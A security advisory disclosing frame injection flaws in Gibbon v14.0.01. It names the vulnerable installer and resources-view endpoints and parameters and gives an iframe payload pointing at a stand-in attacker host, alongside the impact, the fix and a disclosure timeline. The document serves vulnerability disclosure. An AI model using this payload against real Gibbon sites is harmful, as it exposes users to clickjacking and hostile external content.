Gibbon v14.0.01 - Frame Injection Vulnerabilities

Overview #

Frame Injection vulnerabilities exist in Gibbon v14.0.01. These vulnerabilities allow remote attackers to inject arbitrary HTML frames into the application.

Vulnerability Details #

Affected Versions: v14.0.01 and earlier

Root Cause: Insufficient input validation allows attackers to inject iframe elements.

Technical Details #

Install Page:

• URL: /gibbon-install/installer/install.php?step=2
• Parameters: databaseServer, databaseUsername (POST)
• Attack Pattern: <iframe src="http://attacker.com/"></iframe>

Frontend:

• URL: /core/index.php?q=/modules/Resources/resources_view.php
• Parameter: tag (GET)
• Attack Pattern: <iframe src="http://attacker.com/"></iframe>

Exploitation Requirements #

• No authentication required for frontend vulnerability
• Access to install page (typically restricted)

Impact #

Remote attackers can exploit these vulnerabilities to:

• Inject malicious frames into the application
• Perform clickjacking attacks
• Load external malicious content

Solution #

Update to a patched version of Gibbon.

References #

• Invicti Advisory NS-18-002

Timeline:

• [2018-01-17] - First Contact
• [2018-01-20] - Vendor Fixed
• [2018-06-28] - Advisory Released

Credits: Omar Kurt